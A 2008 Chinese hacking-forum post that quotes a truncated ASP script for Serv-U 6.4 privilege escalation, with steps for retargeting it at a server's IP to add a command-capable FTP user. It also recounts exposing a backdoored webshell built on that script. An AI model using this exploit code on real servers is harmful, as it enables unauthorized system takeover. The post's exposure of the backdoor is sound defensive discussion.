[讨论]希望擅长asp解密的大鸟来瞧瞧

议题作者：亲爱的小层
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

   这事挺郁闷的，2008-1-13 在逛黑吧的时候发现了一个文章《SERV-U 6.4提权脚本通杀SERV-U版本》  好象是好东东，于是装老鸟进去看了下，结果完全看不懂。附代码



提权的代码如下:

ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DeleteDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _

修改ftpport为21  

修改newdomain后面的goldsun| IP(为要提权的服务器的IP地址)|

修改newuser后面的 -IP=IP地址和上面一样(为要提权的服务器的IP地址)...OK.....提权...会用FTP增加一个可以

执行命令的用户.....有个这个用户什么不能做




没想到第二天，有个叫幽月的高人做了个 提权通杀Serv-u所有版本(语音)
http://www.hack58.net/Soft/html/9/18/2008/2008011412078.htm
里面使用了文章里的代码，做了个新款的asp马， 于是去他blog看了一下，
啊喔，还真的有 这个新版asp的下载，于是兴高采烈的下来试试。。 顺手看看有没有后门啥的，结果在缓存里发现了点东西。





于是继续装老鸟看了下代码，可惜技术有限，代码被处理过，找不出后门的位置.

一时气愤不过，于是做了个揭露教程，没想到第二天在黑吧  揭露教程跟这款asp马 同时更新提供下载。。 汗。绝对的汗......


中午被后门作者找上门了，给我灌输了一些邪恶的知识，他 正义无私的形象差点就在我心里树立起来了....






聊天记录就放这么多了，免的老鸟看烦了。呵呵

本想事情应该这么结束了，没想到 晚上....



汗，莫非跟我聊回天，被我的佛力感染，放下屠刀了。 老呐再入地狱检测下。。
结果还是死性不改。。  为了不冤枉他，找个朋友开虚拟机，远程上去。结果还是...无话



细想一下，估计明天黑吧 应该也会出现他发布的所谓 去后门版本的asp马吧

不如我再来个揭露教程，再搞笑一下 同时提供下载。呵呵， 目前教程已发。不知道会不会公布。呵呵



废话了那么久，大鸟见谅....

附带 第一版本的后门马 和所谓的 未加密版本的后门马。。。。



第一版本的后门马里的PHP马 已经在黑吧被人详细找出后门位置，
见  http://www.hack58.net/Soft/html/12/24/2007/2007122811896.htm

asp马目前好象没见人说找出来了，更别提所谓的未加密版本的后门位置在那。。
实在蛮佩服作者 放后门的技术，施主，再听老呐一言： 放下屠刀，力地成佛。
  别丢鸡蛋，闪. 希望管理员能把帖子转移一下。呵呵